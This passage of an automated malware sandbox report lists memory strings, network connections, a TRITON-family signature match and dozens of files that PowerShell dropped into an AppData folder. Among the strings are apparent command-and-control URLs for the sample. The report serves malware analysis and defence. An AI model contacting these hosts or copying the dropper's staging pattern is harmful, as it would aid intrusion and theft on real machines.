                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com/download
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com/download/NYou
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06A83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.00000256401FC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.phreedom.org/md5)
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.phreedom.org/md5)08:27
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B996B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.prizeeinternational.com
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB259000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.teisininkas.lt/ivairus/7-zip:
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: msiexec.exe, 0000000A.00000002.2203799689.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/
                    Source: msiexec.exe, 0000000A.00000003.2179717349.0000000000701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/U
                    Source: msiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/api
                    Source: msiexec.exe, 0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/api:
                    Source: msiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/apiob
                    Source: msiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/apirtyM
                    Source: msiexec.exe, 0000000A.00000002.2203799689.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/p
                    Source: msiexec.exe, 0000000A.00000002.2203799689.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5ptit5tuded.cyou/s
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B8FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa06
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://github.com/netty/netty/issues/6520.
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://github.com/netty/netty/issues/6520.s
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ps3.scedev.net/
                    Source: msiexec.exe, 0000000A.00000003.2197813079.0000000000701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/raw
                    Source: msiexec.exe, 0000000A.00000003.2197813079.0000000000701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co:443/feouewe5/raw
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://statsigapi.net
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://statsigapi.net/v1/initializeeax::apps::experimentation::loadFeatureGateseax::apps::experimen
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://store.steampowered.com/app/
                    Source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://store.steampowered.com/app/User
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bitvise.com/0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/repository.
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/03
                    Source: msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: msiexec.exe, 0000000A.00000003.2121144677.000000000554C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: Setup.exe, 00000004.00000002.2003851978.00007FFBA1D8A000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000002.2041202326.00007FFBA9C29000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DED9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2069435347.00007FFBA1D8A000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2084881953.00007FFBA9C29000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49718 version: TLS 1.2

                    System Summary

                    barindex
                    Submitted sample is a known malware sample
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: MD5: 9a7234078559093e06c9d32148ed95a3 Family: TRITON Alias: TEMP.Veles, TRISIS, XENOTIME, HATMAN, TRITON Description: TRITON, named by FireEye, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. It is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It could prevent safety mechanisms from executing their intended function, resulting in a physical consequence.When the attacker gained remote access to an SIS engineering workstation, the TRITON attack framework was deployed to reprogram the SIS controllers, to modify application memory on SIS controllers that could lead to a failed validation check. References: https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.htmlhttps://dragos.com/adversaries.htmlhttps://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocolJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Core.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelperJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Network.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\steam_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dllJump to dropped file
